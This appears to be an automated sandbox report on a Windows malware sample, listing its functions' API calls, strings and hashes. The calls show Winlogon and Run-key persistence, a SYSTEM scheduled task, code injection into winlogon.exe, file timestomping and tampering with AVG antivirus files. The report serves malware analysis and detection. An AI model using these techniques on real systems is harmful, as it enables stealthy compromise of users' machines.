                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction ID: 0b24c45107c0befc32dd0ff84bd5674d64e160e2b6de00103b139920790b26b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 874152B5600208BBE7209B94DD49FAF7BBDEB89741F144026FB04FA2D0D7B49941C7A8
                                                                                                                                                                                                              Function 00402930 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 106registryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 260 402930-40296f RegCreateKeyExA 261 402975-4029d9 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 260->261 262 4029fd-402a1e RegCreateKeyExA 260->262 265 4029e0-4029e5 261->265 263 402a20-402a22 262->263 264 402a44-402a4a 262->264 266 402a25-402a2a 263->266 267 402a4c-402a57 RegFlushKey RegCloseKey 264->267 268 402a5d-402a60 264->268 265->265 269 4029e7-4029fb 265->269 266->266 270 402a2c-402a3d 266->270 267->268 271 402a3e RegSetValueExA 269->271 270->271 271->264
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                              • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                              • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • userinit, xrefs: 00402A38
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                              • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3547530944-2324515132
                                                                                                                                                                                                              • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8
                                                                                                                                                                                                              Function 004014B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 93processstringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 346 4014b0-401531 memset * 2 lstrcpynA CreateProcessA 347 401533-401543 346->347 348 40158f-401597 346->348 349 401545-40154e GetHandleInformation 347->349 350 40155d-401567 347->350 349->350 351 401550-401554 349->351 352 401581-40158c 350->352 353 401569-401572 GetHandleInformation 350->353 351->350 354 401556-401557 CloseHandle 351->354 353->352 355 401574-401578 353->355 354->350 355->352 356 40157a-40157b CloseHandle 355->356 356->352
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 2248944234-2746444292
                                                                                                                                                                                                              • Opcode ID: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction ID: 14e7369bd1a15e27c4b274561f890c179ee839510f861d06d6d7e351d84cbd4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF2167B290020C6FDB10DFE8DD84ADF7BBCAB94355F00457AFA05FA240D6349A458BA4
                                                                                                                                                                                                              Function 00401BE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 357 401be0-401c0c CreateFileA 358 401c12-401c2e GetFileTime 357->358 359 401ca5-401caa 357->359 360 401c30-401c3d GetHandleInformation 358->360 361 401c4c-401c69 CreateFileA 358->361 360->361 362 401c3f-401c43 360->362 361->359 363 401c6b-401c87 SetFileTime 361->363 362->361 364 401c45-401c46 CloseHandle 362->364 363->359 365 401c89-401c96 GetHandleInformation 363->365 364->361 365->359 366 401c98-401c9c 365->366 366->359 367 401c9e-401c9f CloseHandle 366->367 367->359
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                              • SetFileTime.KERNELBASE(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                              • API String ID: 1046229350-2760794270
                                                                                                                                                                                                              • Opcode ID: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction ID: 0895f171d82555aaaa5436e0262d4f4d844cfaf0768df501368bcb823c663742
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE21F9729452187BF7219B50DD09FEF7B6CAF44710F148226FF01B61D0D778964586AC
                                                                                                                                                                                                              Function 004012B0 Relevance: 13.6, APIs: 9, Instructions: 66fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                              • PathFileExistsA.KERNELBASE(?), ref: 00401302
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                              • GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040135C
                                                                                                                                                                                                              • DeleteFileA.KERNELBASE(?), ref: 00401369
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2787354276-0
                                                                                                                                                                                                              • Opcode ID: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction ID: 42c1c782f055159cc2832ed009bcca8814697c7b1d580040d5fe2fedb3335bbb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921CFB1950219AFEB10DBA0DD49FEA77BCFB48700F0046A9A709F6190E6749A44CFA4
                                                                                                                                                                                                              Function 00402450 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                              • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFolderMovePath
                                                                                                                                                                                                              • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                              • API String ID: 1404575960-1083204512
                                                                                                                                                                                                              • Opcode ID: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction ID: 6a3b38723654ace9b65cd78b9e90850702c138762b68f8666c7e3f81cfb55a8f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35215EB45042448FC719DF14EA98B92BBE1FB89300F1581B9DA88A73B2D6B0D944CF98
                                                                                                                                                                                                              Function 0040219A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: v-@
                                                                                                                                                                                                              • API String ID: 3664257935-4190885519
                                                                                                                                                                                                              • Opcode ID: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction ID: 659d1c44b33988b11b994a6559d152e96ecfdb185b9268fc6ed29e1105b0769f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34D05E76E01629CBCB21DF94A5052AEF730FB44731F0043AADE247338083351C118AD5

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 00403560 Relevance: 65.1, APIs: 32, Strings: 5, Instructions: 368memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                              • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • 00-->, xrefs: 0040383F
                                                                                                                                                                                                              • <Actions , xrefs: 0040380A
                                                                                                                                                                                                              • task%d, xrefs: 0040365C
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                              • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                              • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$task%d
                                                                                                                                                                                                              • API String ID: 1601901853-1561668989
                                                                                                                                                                                                              • Opcode ID: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction ID: 3d176fac64e71e3d45e4d3c7787755692d466ba94461fa4e5093d4db6fcc502b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76D1E1B2504301ABD720DF64CC49F5B7BA8EFC8715F044A2AFA49B7291D774EA04CB99
                                                                                                                                                                                                              Function 004018E0 Relevance: 52.7, APIs: 29, Strings: 1, Instructions: 234memoryprocessCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                              • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 3422789474-2746444292
                                                                                                                                                                                                              • Opcode ID: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction ID: 871197f746f8751ebb4c77b71a3ee3543858eb92964eac2fec8a8f15daba1beb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D861D8B1A013157BDB209FA69C48FAB7B6CEF84750F15412AFA18B72D0DA749900CFB4
                                                                                                                                                                                                              Function 00401670 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215injectionlibrarymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76F90F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?), ref: 004017D8
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
